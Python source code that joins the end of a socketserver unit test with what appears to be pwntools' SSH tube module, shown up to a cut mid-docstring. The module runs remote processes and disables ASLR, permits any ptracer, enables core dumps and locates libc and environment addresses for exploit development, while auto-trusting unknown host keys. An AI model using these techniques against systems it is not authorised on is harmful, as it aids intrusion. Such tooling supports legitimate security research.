self.assertIsInstance(server.wfile, io.BufferedIOBase)
self.assertEqual(server.wfile_fileno, server.request_fileno)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_write(self):
# Test that wfile.write() sends data immediately, and that it does
# not truncate sends when interrupted by a Unix signal
pthread_kill = test.support.get_attribute(signal, 'pthread_kill')
class Handler(socketserver.StreamRequestHandler):
def handle(self):
self.server.sent1 = self.wfile.write(b'write data\n')
# Should be sent immediately, without requiring flush()
self.server.received = self.rfile.readline()
big_chunk = b'\0' * test.support.SOCK_MAX_SIZE
self.server.sent2 = self.wfile.write(big_chunk)
server = socketserver.TCPServer((HOST, 0), Handler)
self.addCleanup(server.server_close)
interrupted = threading.Event()
def signal_handler(signum, frame):
interrupted.set()
original = signal.signal(signal.SIGUSR1, signal_handler)
self.addCleanup(signal.signal, signal.SIGUSR1, original)
response1 = None
received2 = None
main_thread = threading.get_ident()
def run_client():
s = socket.socket(server.address_family, socket.SOCK_STREAM,
socket.IPPROTO_TCP)
with s, s.makefile('rb') as reader:
s.connect(server.server_address)
nonlocal response1
response1 = reader.readline()
s.sendall(b'client response\n')
reader.read(100)
# The main thread should now be blocking in a send() syscall.
# But in theory, it could get interrupted by other signals,
# and then retried. So keep sending the signal in a loop, in
# case an earlier signal happens to be delivered at an
# inconvenient moment.
while True:
pthread_kill(main_thread, signal.SIGUSR1)
if interrupted.wait(timeout=float(1)):
break
nonlocal received2
received2 = len(reader.read())
background = threading.Thread(target=run_client)
background.start()
server.handle_request()
background.join()
self.assertEqual(server.sent1, len(response1))
self.assertEqual(response1, b'write data\n')
self.assertEqual(server.received, b'client response\n')
self.assertEqual(server.sent2, test.support.SOCK_MAX_SIZE)
self.assertEqual(received2, test.support.SOCK_MAX_SIZE - 100)
class MiscTestCase(unittest.TestCase):
def test_all(self):
# objects defined in the module should be in __all__
expected = []
for name in dir(socketserver):
if not name.startswith('_'):
mod_object = getattr(socketserver, name)
if getattr(mod_object, '__module__', None) == 'socketserver':
expected.append(name)
self.assertCountEqual(socketserver.__all__, expected)
def test_shutdown_request_called_if_verify_request_false(self):
# Issue #26309: BaseServer should call shutdown_request even if
# verify_request is False
class MyServer(socketserver.TCPServer):
def verify_request(self, request, client_address):
return False
shutdown_called = 0
def shutdown_request(self, request):
self.shutdown_called += 1
socketserver.TCPServer.shutdown_request(self, request)
server = MyServer((HOST, 0), socketserver.StreamRequestHandler)
s = socket.socket(server.address_family, socket.SOCK_STREAM)
s.connect(server.server_address)
s.close()
server.handle_request()
self.assertEqual(server.shutdown_called, 1)
server.server_close()
if __name__ == "__main__":
unittest.main()
|
ssh.py
|
from __future__ import absolute_import
from __future__ import division
import inspect
import logging
import os
import re
import shutil
import six
import string
import sys
import tarfile
import tempfile
import threading
import time
import types
from pwnlib import term
from pwnlib.context import context, LocalContext
from pwnlib.log import Logger
from pwnlib.log import getLogger
from pwnlib.term import text
from pwnlib.timeout import Timeout
from pwnlib.tubes.sock import sock
from pwnlib.util import hashes
from pwnlib.util import misc
from pwnlib.util import packing
from pwnlib.util import safeeval
from pwnlib.util.sh_string import sh_string
# Kill the warning line:
# No handlers could be found for logger "paramiko.transport"
paramiko_log = logging.getLogger("paramiko.transport")
h = logging.StreamHandler(open(os.devnull,'w+'))
h.setFormatter(logging.Formatter())
paramiko_log.addHandler(h)
class ssh_channel(sock):
#: Parent :class:`ssh` object
parent = None
#: Remote host
host = None
#: Return code, or :const:`None` if the process has not returned
#: Use :meth:`poll` to check.
returncode = None
#: :const:`True` if a tty was allocated for this channel
tty = False
#: Environment specified for the remote process, or :const:`None`
#: if the default environment was used
env = None
#: Command specified for the constructor
process = None
def __init__(self, parent, process = None, tty = False, wd = None, env = None, raw = True, *args, **kwargs):
super(ssh_channel, self).__init__(*args, **kwargs)
# keep the parent from being garbage collected in some cases
self.parent = parent
self.returncode = None
self.host = parent.host
self.tty = tty
self.env = env
self.process = process
self.cwd = wd or '.'
if isinstance(wd, six.text_type):
wd = packing._need_bytes(wd, 2, 0x80)
env = env or {}
msg = 'Opening new channel: %r' % (process or 'shell')
if isinstance(process, (list, tuple)):
process = b' '.join(sh_string(packing._need_bytes(s, 2, 0x80)) for s in process)
if isinstance(process, six.text_type):
process = packing._need_bytes(process, 2, 0x80)
if process and wd:
process = b'cd ' + sh_string(wd) + b' >/dev/null 2>&1; ' + process
if process and env:
for name, value in env.items():
nameb = packing._need_bytes(name, 2, 0x80)
if not re.match(b'^[a-zA-Z_][a-zA-Z0-9_]*$', nameb):
self.error('run(): Invalid environment key %r' % name)
export = b'export %s=%s;' % (nameb, sh_string(packing._need_bytes(value, 2, 0x80)))
process = export + process
if process and tty:
if raw:
process = b'stty raw -ctlecho -echo; ' + process
else:
process = b'stty -ctlecho -echo; ' + process
# If this object is enabled for DEBUG-level logging, don't hide
# anything about the command that's actually executed.
if process and self.isEnabledFor(logging.DEBUG):
msg = 'Opening new channel: %r' % ((process,) or 'shell')
with self.waitfor(msg) as h:
import paramiko
try:
self.sock = parent.transport.open_session()
except paramiko.ChannelException as e:
if e.args == (1, 'Administratively prohibited'):
self.error("Too many sessions open! Use ssh_channel.close() or 'with'!")
raise e
if self.tty:
self.sock.get_pty('xterm', term.width, term.height)
def resizer():
if self.sock:
try:
self.sock.resize_pty(term.width, term.height)
except paramiko.ssh_exception.SSHException:
pass
self.resizer = resizer
term.term.on_winch.append(self.resizer)
else:
self.resizer = None
# Put stderr on stdout. This might not always be desirable,
# but our API does not support multiple streams
self.sock.set_combine_stderr(True)
self.settimeout(self.timeout)
if process:
self.sock.exec_command(process)
else:
self.sock.invoke_shell()
h.success()
def kill(self):
"""kill()
Kills the process.
"""
self.close()
def recvall(self, timeout = sock.forever):
# We subclass tubes.sock which sets self.sock to None.
#
# However, we need to wait for the return value to propagate,
# which may not happen by the time .close() is called by tube.recvall()
tmp_sock = self.sock
tmp_close = self.close
self.close = lambda: None
timeout = self.maximum if self.timeout is self.forever else self.timeout
data = super(ssh_channel, self).recvall(timeout)
# Restore self.sock to be able to call wait()
self.close = tmp_close
self.sock = tmp_sock
self.wait()
self.close()
# Again set self.sock to None
self.sock = None
return data
def wait(self, timeout=sock.default):
# TODO: deal with timeouts
return self.poll(block=True)
def poll(self, block=False):
"""poll() -> int
Poll the exit code of the process. Will return None, if the
process has not yet finished and the exit code otherwise.
"""
if self.returncode is None and self.sock \
and (block or self.sock.exit_status_ready()):
while not self.sock.status_event.is_set():
self.sock.status_event.wait(0.05)
self.returncode = self.sock.recv_exit_status()
return self.returncode
def can_recv_raw(self, timeout):
with self.countdown(timeout):
while self.countdown_active():
if self.sock.recv_ready():
return True
time.sleep(min(self.timeout, 0.05))
return False
def interactive(self, prompt = term.text.bold_red('$') + ' '):
"""interactive(prompt = pwnlib.term.text.bold_red('$') + ' ')
If not in TTY-mode, this does exactly the same as
meth:`pwnlib.tubes.tube.tube.interactive`, otherwise
it does mostly the same.
An SSH connection in TTY-mode will typically supply its own prompt,
thus the prompt argument is ignored in this case.
We also have a few SSH-specific hacks that will ideally be removed
once the :mod:`pwnlib.term` is more mature.
"""
# If we are only executing a regular old shell, we need to handle
# control codes (specifically Ctrl+C).
#
# Otherwise, we can just punt to the default implementation of interactive()
if self.process is not None:
return super(ssh_channel, self).interactive(prompt)
self.info('Switching to interactive mode')
# We would like a cursor, please!
term.term.show_cursor()
event = threading.Event()
def recv_thread(event):
while not event.is_set():
try:
cur = self.recv(timeout = 0.05)
cur = cur.replace(b'\r\n',b'\n')
cur = cur.replace(b'\r',b'')
if cur is None:
continue
elif cur == b'\a':
# Ugly hack until term unstands bell characters
continue
stdout = sys.stdout
if not term.term_mode:
stdout = getattr(stdout, 'buffer', stdout)
stdout.write(cur)
stdout.flush()
except EOFError:
self.info('Got EOF while reading in interactive')
event.set()
break
t = context.Thread(target = recv_thread, args = (event,))
t.daemon = True
t.start()
while not event.is_set():
if term.term_mode:
try:
data = term.key.getraw(0.1)
except KeyboardInterrupt:
data = [3] # This is ctrl-c
except IOError:
if not event.is_set():
raise
else:
stdin = getattr(sys.stdin, 'buffer', sys.stdin)
data = stdin.read(1)
if not data:
event.set()
else:
data = bytearray(data)
if data:
try:
self.send(bytes(bytearray(data)))
except EOFError:
event.set()
self.info('Got EOF while sending in interactive')
while t.is_alive():
t.join(timeout = 0.1)
# Restore
term.term.hide_cursor()
def close(self):
self.poll()
while self.resizer in term.term.on_winch:
term.term.on_winch.remove(self.resizer)
super(ssh_channel, self).close()
def spawn_process(self, *args, **kwargs):
self.error("Cannot use spawn_process on an SSH channel.""")
def _close_msg(self):
self.info('Closed SSH channel with %s' % self.host)
class ssh_process(ssh_channel):
#: Working directory
cwd = None
#: PID of the process
#: Only valid when instantiated through :meth:`ssh.process`
pid = None
#: Executable of the procesks
#: Only valid when instantiated through :meth:`ssh.process`
executable = None
#: Arguments passed to the process
#: Only valid when instantiated through :meth:`ssh.process`
argv = None
def libs(self):
"""libs() -> dict
Returns a dictionary mapping the address of each loaded library in the
process's address space.
If ``/proc/$PID/maps`` cannot be opened, the output of ldd is used
verbatim, which may be different than the actual addresses if ASLR
is enabled.
"""
maps = self.parent.libs(self.executable)
maps_raw = self.parent.cat('/proc/%d/maps' % self.pid).decode()
for lib in maps:
remote_path = lib.split(self.parent.host)[-1]
for line in maps_raw.splitlines():
if line.endswith(remote_path):
address = line.split('-')[0]
maps[lib] = int(address, 16)
break
return maps
@property
def libc(self):
"""libc() -> ELF
Returns an ELF for the libc for the current process.
If possible, it is adjusted to the correct address
automatically.
Examples:
>>> s = ssh(host='example.pwnme')
>>> p = s.process('true')
>>> p.libc # doctest: +ELLIPSIS
ELF(.../libc.so.6')
"""
from pwnlib.elf import ELF
for lib, address in self.libs().items():
if 'libc.so' in lib:
e = ELF(lib)
e.address = address
return e
@property
def elf(self):
"""elf() -> pwnlib.elf.elf.ELF
Returns an ELF file for the executable that launched the process.
"""
import pwnlib.elf.elf
libs = self.parent.libs(self.executable)
for lib in libs:
# Cannot just check "executable in lib", see issue #1047
if lib.endswith(self.executable):
return pwnlib.elf.elf.ELF(lib)
@property
def corefile(self):
import pwnlib.elf.corefile
finder = pwnlib.elf.corefile.CorefileFinder(self)
if not finder.core_path:
self.error("Could not find core file for pid %i" % self.pid)
return pwnlib.elf.corefile.Corefile(finder.core_path)
def getenv(self, variable, **kwargs):
r"""Retrieve the address of an environment variable in the remote process.
Examples:
>>> s = ssh(host='example.pwnme')
>>> p = s.process(['python', '-c', 'import time; time.sleep(10)'])
>>> hex(p.getenv('PATH')) # doctest: +ELLIPSIS
'0x...'
"""
argv0 = self.argv[0]
variable = bytearray(packing._need_bytes(variable, min_wrong=0x80))
script = ';'.join(('from ctypes import *',
'import os',
'libc = CDLL("libc.so.6")',
'getenv = libc.getenv',
'getenv.restype = c_void_p',
'print(os.path.realpath(%r))' % self.executable,
'print(getenv(bytes(%r)))' % variable,))
try:
with context.quiet:
python = self.parent.which('python2.7') or self.parent.which('python3') or self.parent.which('python')
if not python:
self.error("Python is not installed on the remote system.")
io = self.parent.process([argv0,'-c', script.strip()],
executable=python,
env=self.env,
**kwargs)
path = io.recvline()
address = int(io.recvall())
address -= len(python)
address += len(path)
return int(address) & context.mask
except Exception:
self.exception("Could not look up environment variable %r" % variable)
def _close_msg(self):
# If we never completely started up, just use the parent implementation
if self.executable is None:
return super(ssh_process, self)._close_msg()
self.info('Stopped remote process %r on %s (pid %i)' \
% (os.path.basename(self.executable),
self.host,
self.pid))
class ssh_connecter(sock):
def __init__(self, parent, host, port, *a, **kw):
super(ssh_connecter, self).__init__(*a, **kw)
# keep the parent from being garbage collected in some cases
self.parent = parent
self.host = parent.host
self.rhost = host
self.rport = port
msg = 'Connecting to %s:%d via SSH to %s' % (self.rhost, self.rport, self.host)
with self.waitfor(msg) as h:
try:
self.sock = parent.transport.open_channel('direct-tcpip', (host, port), ('127.0.0.1', 0))
except Exception as e:
self.exception(e.message)
raise
try:
# Iterate all layers of proxying to get to base-level Socket object
curr = self.sock.get_transport().sock
while getattr(curr, "get_transport", None):
curr = curr.get_transport().sock
sockname = curr.getsockname()
self.lhost = sockname[0]
self.lport = sockname[1]
except Exception as e:
self.exception("Could not find base-level Socket object.")
raise e
h.success()
def spawn_process(self, *args, **kwargs):
self.error("Cannot use spawn_process on an SSH channel.""")
def _close_msg(self):
self.info("Closed remote connection to %s:%d via SSH connection to %s" % (self.rhost, self.rport, self.host))
class ssh_listener(sock):
def __init__(self, parent, bind_address, port, *a, **kw):
super(ssh_listener, self).__init__(*a, **kw)
# keep the parent from being garbage collected in some cases
self.parent = parent
self.host = parent.host
try:
self.port = parent.transport.request_port_forward(bind_address, port)
except Exception:
h.failure('Failed create a port forwarding')
raise
def accepter():
msg = 'Waiting on port %d via SSH to %s' % (self.port, self.host)
h = self.waitfor(msg)
try:
self.sock = parent.transport.accept()
parent.transport.cancel_port_forward(bind_address, self.port)
except Exception:
self.sock = None
h.failure()
self.exception('Failed to get a connection')
return
self.rhost, self.rport = self.sock.origin_addr
h.success('Got connection from %s:%d' % (self.rhost, self.rport))
self._accepter = context.Thread(target = accepter)
self._accepter.daemon = True
self._accepter.start()
def _close_msg(self):
self.info("Closed remote connection to %s:%d via SSH listener on port %d via %s" % (self.rhost, self.rport, self.port, self.host))
def spawn_process(self, *args, **kwargs):
self.error("Cannot use spawn_process on an SSH channel.""")
def wait_for_connection(self):
"""Blocks until a connection has been established."""
_ = self.sock
return self
def __getattr__(self, key):
if key == 'sock':
while self._accepter.is_alive():
self._accepter.join(timeout = 0.1)
return self.sock
else:
return getattr(super(ssh_listener, self), key)
class ssh(Timeout, Logger):
#: Remote host name (``str``)
host = None
#: Remote port (``int``)
port = None
#: Enable caching of SSH downloads (``bool``)
cache = True
#: Paramiko SSHClient which backs this object
client = None
#: Paramiko SFTPClient object which is used for file transfers.
#: Set to :const:`None` to disable ``sftp``.
sftp = None
#: PID of the remote ``sshd`` process servicing this connection.
pid = None
_cwd = '.'
def __init__(self, user=None, host=None, port=22, password=None, key=None,
keyfile=None, proxy_command=None, proxy_sock=None,
level=None, cache=True, ssh_agent=False, ignore_config=False, *a, **kw):
"""Creates a new ssh connection.
Arguments:
user(str): The username to log in with
host(str): The hostname to connect to
port(int): The port to connect to
password(str): Try to authenticate using this password
key(str): Try to authenticate using this private key. The string should be the actual private key.
keyfile(str): Try to authenticate using this private key. The string should be a filename.
proxy_command(str): Use this as a proxy command. It has approximately the same semantics as ProxyCommand from ssh(1).
proxy_sock(str): Use this socket instead of connecting to the host.
timeout: Timeout, in seconds
level: Log level
cache: Cache downloaded files (by hash/size/timestamp)
ssh_agent: If :const:`True`, enable usage of keys via ssh-agent
ignore_config: If :const:`True`, disable usage of ~/.ssh/config and ~/.ssh/authorized_keys
NOTE: The proxy_command and proxy_sock arguments is only available if a
fairly new version of paramiko is used.
Example proxying:
.. doctest::
:skipif: True
>>> s1 = ssh(host='example.pwnme')
>>> r1 = s1.remote('localhost', 22)
>>> s2 = ssh(host='example.pwnme', proxy_sock=r1.sock)
>>> r2 = s2.remote('localhost', 22) # and so on...
>>> for x in r2, s2, r1, s1: x.close()
"""
super(ssh, self).__init__(*a, **kw)
Logger.__init__(self)
if level is not None:
self.setLevel(level)
self.host = host
self.port = port
self.user = user
self.password = password
self.key = key
self.keyfile = keyfile
self._cachedir = os.path.join(tempfile.gettempdir(), 'pwntools-ssh-cache')
self.cache = cache
# Deferred attributes
self._platform_info = {}
self._aslr = None
self._aslr_ulimit = None
misc.mkdir_p(self._cachedir)
import paramiko
# Make a basic attempt to parse the ssh_config file
try:
config_file = os.path.expanduser('~/.ssh/config')
if not ignore_config and os.path.exists(config_file):
ssh_config = paramiko.SSHConfig()
ssh_config.parse(open(config_file))
host_config = ssh_config.lookup(host)
if 'hostname' in host_config:
self.host = host = host_config['hostname']
if not user and 'user' in host_config:
self.user = user = host_config['user']
if not keyfile and 'identityfile' in host_config:
keyfile = host_config['identityfile'][0]
if keyfile.lower() == 'none':
keyfile = None
except Exception as e:
self.debug("An error occurred while parsing ~/.ssh/config:\n%s" % e)
keyfiles = [os.path.expanduser(keyfile)] if keyfile else []
msg = 'Connecting to %s on port %d' % (host, port)
with self.waitfor(msg) as h:
self.client = paramiko.SSHClient()
self.client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
if not ignore_config:
known_hosts = os.path.expanduser('~/.ssh/known_hosts')
if os.path.exists(known_hosts):
self.client.load_host_keys(known_hosts)
has_proxy = bool(proxy_sock or proxy_command)
if has_proxy:
if 'ProxyCommand' not in dir(paramiko):
self.error('This version of paramiko does not support proxies.')
if proxy_sock and proxy_command:
self.error('Cannot have both a proxy command and a proxy sock')
if proxy_command:
proxy_sock = paramiko.ProxyCommand(proxy_command)
else:
proxy_sock = None
try:
self.client.connect(host, port, user, password, key, keyfiles, self.timeout, allow_agent=ssh_agent, compress=True, sock=proxy_sock, look_for_keys=not ignore_config)
except paramiko.BadHostKeyException as e:
self.error("Remote host %(host)s is using a different key than stated in known_hosts\n"
" To remove the existing entry from your known_hosts and trust the new key, run the following commands:\n"
" $ ssh-keygen -R %(host)s\n"
" $ ssh-keygen -R [%(host)s]:%(port)s" % locals())
self.transport = self.client.get_transport()
self.transport.use_compression(True)
h.success()
self._tried_sftp = False
if self.sftp:
with context.quiet:
self.cwd = packing._decode(self.pwd())
else:
self.cwd = '.'
with context.local(log_level='error'):
def getppid():
print(os.getppid())
try:
self.pid = int(self.process('false', preexec_fn=getppid).recvall())
except Exception:
self.pid = None
try:
self.info_once(self.checksec())
except Exception:
self.warn_once("Couldn't check security settings on %r" % self.host)
def __repr__(self):
return "{}(user={!r}, host={!r})".format(self.__class__.__name__, self.user, self.host)
@property
def cwd(self):
return self._cwd
@cwd.setter
def cwd(self, cwd):
self._cwd = cwd
if self.sftp:
self.sftp.chdir(cwd)
@property
def sftp(self):
if not self._tried_sftp:
try:
self._sftp = self.transport.open_sftp_client()
except Exception:
self._sftp = None
self._tried_sftp = True
return self._sftp
@sftp.setter
def sftp(self, value):
self._sftp = value
self._tried_sftp = True
def __enter__(self, *a):
return self
def __exit__(self, *a, **kw):
self.close()
def shell(self, shell = None, tty = True, timeout = Timeout.default):
"""shell(shell = None, tty = True, timeout = Timeout.default) -> ssh_channel
Open a new channel with a shell inside.
Arguments:
shell(str): Path to the shell program to run.
If :const:`None`, uses the default shell for the logged in user.
tty(bool): If :const:`True`, then a TTY is requested on the remote server.
Returns:
Return a :class:`pwnlib.tubes.ssh.ssh_channel` object.
Examples:
>>> s = ssh(host='example.pwnme')
>>> sh = s.shell('/bin/sh')
>>> sh.sendline(b'echo Hello; exit')
>>> print(b'Hello' in sh.recvall())
True
"""
return self.run(shell, tty, timeout = timeout)
def process(self, argv=None, executable=None, tty=True, cwd=None, env=None, timeout=Timeout.default, run=True,
stdin=0, stdout=1, stderr=2, preexec_fn=None, preexec_args=(), raw=True, aslr=None, setuid=None,
shell=False):
r"""
Executes a process on the remote server, in the same fashion
as pwnlib.tubes.process.process.
To achieve this, a Python script is created to call ``os.execve``
with the appropriate arguments.
As an added bonus, the ``ssh_channel`` object returned has a
``pid`` property for the process pid.
Arguments:
argv(list):
List of arguments to pass into the process
executable(str):
Path to the executable to run.
If :const:`None`, ``argv[0]`` is used.
tty(bool):
Request a `tty` from the server. This usually fixes buffering problems
by causing `libc` to write data immediately rather than buffering it.
However, this disables interpretation of control codes (e.g. Ctrl+C)
and breaks `.shutdown`.
cwd(str):
Working directory. If :const:`None`, uses the working directory specified
on :attr:`cwd` or set via :meth:`set_working_directory`.
env(dict):
Environment variables to set in the child. If :const:`None`, inherits the
default environment.
timeout(int):
Timeout to set on the `tube` created to interact with the process.
run(bool):
Set to :const:`True` to run the program (default).
If :const:`False`, returns the path to an executable Python script on the
remote server which, when executed, will do it.
stdin(int, str):
If an integer, replace stdin with the numbered file descriptor.
If a string, a open a file with the specified path and replace
stdin with its file descriptor. May also be one of ``sys.stdin``,
``sys.stdout``, ``sys.stderr``. If :const:`None`, the file descriptor is closed.
stdout(int, str):
See ``stdin``.
stderr(int, str):
See ``stdin``.
preexec_fn(callable):
Function which is executed on the remote side before execve().
This **MUST** be a self-contained function -- it must perform
all of its own imports, and cannot refer to variables outside
its scope.
preexec_args(object):
Argument passed to ``preexec_fn``.
This **MUST** only consist of native Python objects.
raw(bool):
If :const:`True`, disable TTY control code interpretation.
aslr(bool):
See :class:`pwnlib.tubes.process.process` for more information.
setuid(bool):
See :class:`pwnlib.tubes.process.process` for more information.
shell(bool):
Pass the command-line arguments to the shell.
Returns:
A new SSH channel, or a path to a script if ``run=False``.
Notes:
Requires Python on the remote server.
Examples:
>>> s = ssh(host='example.pwnme')
>>> sh = s.process('/bin/sh', env={'PS1':''})
>>> sh.sendline(b'echo Hello; exit')
>>> sh.recvall()
b'Hello\n'
>>> s.process(['/bin/echo', b'\xff']).recvall()
b'\xff\n'
>>> s.process(['readlink', '/proc/self/exe']).recvall() # doctest: +ELLIPSIS
b'.../bin/readlink\n'
>>> s.process(['LOLOLOL', '/proc/self/exe'], executable='readlink').recvall() # doctest: +ELLIPSIS
b'.../bin/readlink\n'
>>> s.process(['LOLOLOL\x00', '/proc/self/cmdline'], executable='cat').recvall()
b'LOLOLOL\x00/proc/self/cmdline\x00'
>>> sh = s.process(executable='/bin/sh')
>>> str(sh.pid).encode() in s.pidof('sh') # doctest: +SKIP
True
>>> s.process(['pwd'], cwd='/tmp').recvall()
b'/tmp\n'
>>> p = s.process(['python','-c','import os; os.write(1, os.read(2, 1024))'], stderr=0)
>>> p.send(b'hello')
>>> p.recv()
b'hello'
>>> s.process(['/bin/echo', 'hello']).recvall()
b'hello\n'
>>> s.process(['/bin/echo', 'hello'], stdout='/dev/null').recvall()
b''
>>> s.process(['/usr/bin/env'], env={}).recvall()
b''
>>> s.process('/usr/bin/env', env={'A':'B'}).recvall()
b'A=B\n'
>>> s.process('false', preexec_fn=1234)
Traceback (most recent call last):
...
PwnlibException: preexec_fn must be a function
>>> s.process('false', preexec_fn=lambda: 1234)
Traceback (most recent call last):
...
PwnlibException: preexec_fn cannot be a lambda
>>> def uses_globals():
... foo = bar
>>> print(s.process('false', preexec_fn=uses_globals).recvall().strip().decode()) # doctest: +ELLIPSIS
Traceback (most recent call last):
...
NameError: ...name 'bar' is not defined
>>> s.process('echo hello', shell=True).recvall()
b'hello\n'
>>> io = s.process(['cat'], timeout=5)
>>> io.recvline()
b''
"""
if not argv and not executable:
self.error("Must specify argv or executable")
aslr = aslr if aslr is not None else context.aslr
argv, env = misc.normalize_argv_env(argv, env, self)
if shell:
if len(argv) != 1:
self.error('Cannot provide more than 1 argument if shell=True')
argv = [bytearray(b'/bin/sh'), bytearray(b'-c')] + argv
executable = executable or argv[0]
cwd = cwd or self.cwd
# Validate, since failures on the remote side will suck.
if not isinstance(executable, (six.text_type, six.binary_type, bytearray)):
self.error("executable / argv[0] must be a string: %r" % executable)
executable = bytearray(packing._need_bytes(executable, min_wrong=0x80))
# Allow passing in sys.stdin/stdout/stderr objects
handles = {sys.stdin: 0, sys.stdout:1, sys.stderr:2}
stdin = handles.get(stdin, stdin)
stdout = handles.get(stdout, stdout)
stderr = handles.get(stderr, stderr)
# Allow the user to provide a self-contained function to run
def func(): pass
func = preexec_fn or func
func_args = preexec_args
if not isinstance(func, types.FunctionType):
self.error("preexec_fn must be a function")
func_name = func.__name__
if func_name == (lambda: 0).__name__:
self.error("preexec_fn cannot be a lambda")
func_src = inspect.getsource(func).strip()
setuid = True if setuid is None else bool(setuid)
script = r"""
#!/usr/bin/env python
import os, sys, ctypes, resource, platform, stat
from collections import OrderedDict
try:
integer_types = int, long
except NameError:
integer_types = int,
exe = bytes(%(executable)r)
argv = [bytes(a) for a in %(argv)r]
env = %(env)r
os.chdir(%(cwd)r)
environ = getattr(os, 'environb', os.environ)
if env is not None:
env = OrderedDict((bytes(k), bytes(v)) for k,v in env)
os.environ.clear()
environ.update(env)
else:
env = os.environ
def is_exe(path):
return os.path.isfile(path) and os.access(path, os.X_OK)
PATH = environ.get(b'PATH',b'').split(os.pathsep.encode())
if os.path.sep.encode() not in exe and not is_exe(exe):
for path in PATH:
test_path = os.path.join(path, exe)
if is_exe(test_path):
exe = test_path
break
if not is_exe(exe):
sys.stderr.write('3\n')
sys.stderr.write("{!r} is not executable or does not exist in $PATH: {!r}".format(exe,PATH))
sys.exit(-1)
if not %(setuid)r:
PR_SET_NO_NEW_PRIVS = 38
result = ctypes.CDLL('libc.so.6').prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)
if result != 0:
sys.stdout.write('3\n')
sys.stdout.write("Could not disable setuid: prctl(PR_SET_NO_NEW_PRIVS) failed")
sys.exit(-1)
try:
PR_SET_PTRACER = 0x59616d61
PR_SET_PTRACER_ANY = -1
ctypes.CDLL('libc.so.6').prctl(PR_SET_PTRACER, PR_SET_PTRACER_ANY, 0, 0, 0)
except Exception:
pass
# Determine what UID the process will execute as
# This is used for locating apport core dumps
suid = os.getuid()
sgid = os.getgid()
st = os.stat(exe)
if %(setuid)r:
if (st.st_mode & stat.S_ISUID):
suid = st.st_uid
if (st.st_mode & stat.S_ISGID):
sgid = st.st_gid
if sys.argv[-1] == 'check':
sys.stdout.write("1\n")
sys.stdout.write(str(os.getpid()) + "\n")
sys.stdout.write(str(os.getuid()) + "\n")
sys.stdout.write(str(os.getgid()) + "\n")
sys.stdout.write(str(suid) + "\n")
sys.stdout.write(str(sgid) + "\n")
getattr(sys.stdout, 'buffer', sys.stdout).write(os.path.realpath(exe) + b'\x00')
sys.stdout.flush()
for fd, newfd in {0: %(stdin)r, 1: %(stdout)r, 2:%(stderr)r}.items():
if newfd is None:
os.close(fd)
elif isinstance(newfd, (str, bytes)):
newfd = os.open(newfd, os.O_RDONLY if fd == 0 else (os.O_RDWR|os.O_CREAT))
os.dup2(newfd, fd)
os.close(newfd)
elif isinstance(newfd, integer_types) and newfd != fd:
os.dup2(fd, newfd)
if not %(aslr)r:
if platform.system().lower() == 'linux' and %(setuid)r is not True:
ADDR_NO_RANDOMIZE = 0x0040000
ctypes.CDLL('libc.so.6').personality(ADDR_NO_RANDOMIZE)
resource.setrlimit(resource.RLIMIT_STACK, (-1, -1))
# Attempt to dump ALL core file regions
try:
with open('/proc/self/coredump_filter', 'w') as core_filter:
core_filter.write('0x3f\n')
except Exception:
pass
# Assume that the user would prefer to have core dumps.
try:
resource.setrlimit(resource.RLIMIT_CORE, (-1, -1))
except Exception:
pass
%(func_src)s
%(func_name)s(*%(func_args)r)
os.execve(exe, argv, env)
""" % locals() # """
script = script.strip()
self.debug("Created execve script:\n" + script)
if not run:
with context.local(log_level='error'):
tmpfile = self.mktemp('-t', 'pwnlib-execve-XXXXXXXXXX')
self.chmod('+x', tmpfile)
self.info("Uploading execve script to %r" % tmpfile)
self.upload_data(script, tmpfile)
return tmpfile
if self.isEnabledFor(logging.DEBUG):
execve_repr = "execve(%r, %s, %s)" % (executable,
argv,
'os.environ'
if (env in (None, os.environ))
else env)
# Avoid spamming the screen
if self.isEnabledFor(logging.DEBUG) and len(execve_repr) > 512:
execve_repr = execve_repr[:512] + '...'
else:
execve_repr = repr(executable)
msg = 'Starting remote process %s on %s' % (execve_repr, self.host)
if timeout == Timeout.default:
timeout = self.timeout
with self.progress(msg) as h:
script = 'echo PWNTOOLS; for py in python3 python2.7 python2 python; do test -x "$(which $py 2>&1)" && echo $py && exec $py -c %s check; done; echo 2' % sh_string(script)
with context.quiet:
python = ssh_process(self, script, tty=True, raw=True, level=self.level, timeout=timeout)
try:
python.recvline_contains(b'PWNTOOLS') # Magic flag so that any sh/bash initialization errors are swallowed
python.recvline() # Python interpreter that was selected
result = safeeval.const(python.recvline()) # Status flag from the Python script
except (EOFError, ValueError):
h.failure("Process creation failed")
self.warn_once('Could not find a Python interpreter on %s\n' % self.host
+ "Use ssh.run() instead of ssh.process()\n"
"The original error message:\n"
+ python.recvall().decode())
return None
# If an error occurred, try to grab as much output
# as we can.
if result != 1:
error_message = python.recvrepeat(timeout=1)
if result == 0:
self.error("%r does not exist or is not executable" % executable)
elif result == 3:
self.error(error_message)
elif result == 2:
self.error("python is not installed on the remote system %r" % self.host)
elif result != 1:
h.failure("something bad happened:\n%s" % error_message)
python.pid = safeeval.const(python.recvline())
python.uid = safeeval.const(python.recvline())
python.gid = safeeval.const(python.recvline())
python.suid = safeeval.const(python.recvline())
python.sgid = safeeval.const(python.recvline())
python.argv = argv
python.executable = packing._decode(python.recvuntil(b'\x00')[:-1])
h.success('pid %i' % python.pid)
if not aslr and setuid and (python.uid != python.suid or python.gid != python.sgid):
effect = "partial" if self.aslr_ulimit else "no"
message = "Specfied aslr=False on setuid binary %s\n" % python.executable
message += "This will have %s effect. Add setuid=False to disable ASLR for debugging.\n" % effect
if self.aslr_ulimit:
message += "Unlimited stack size should de-randomize shared libraries."
self.warn_once(message)
elif not aslr:
self.warn_once("ASLR is disabled for %r!" % python.executable)
return python
def which(self, program):
"""which(program) -> str
Minor modification to just directly invoking ``which`` on the remote
system which adds the current working directory to the end of ``$PATH``.
"""
# If name is a path, do not attempt to resolve it.
if os.path.sep in program:
return program
result = self.run('export PATH=$PATH:$PWD; which %s' % program).recvall().strip().decode()
if ('/%s' % program) not in result:
return None
return result
def system(self, process, tty = True, wd = None, env = None, timeout = None, raw = True):
r"""system(process, tty = True, wd = None, env = None, timeout = Timeout.default, raw = True) -> ssh_channel
Open a new channel with a specific process inside. If `tty` is True,
then a TTY is requested on the remote server.
If `raw` is True, terminal control codes are ignored and input is not
echoed back.
Return a :class:`pwnlib.tubes.ssh.ssh_channel` object.
Examples:
>>> s = ssh(host='example.pwnme')
>>> py = s.run('python -i')
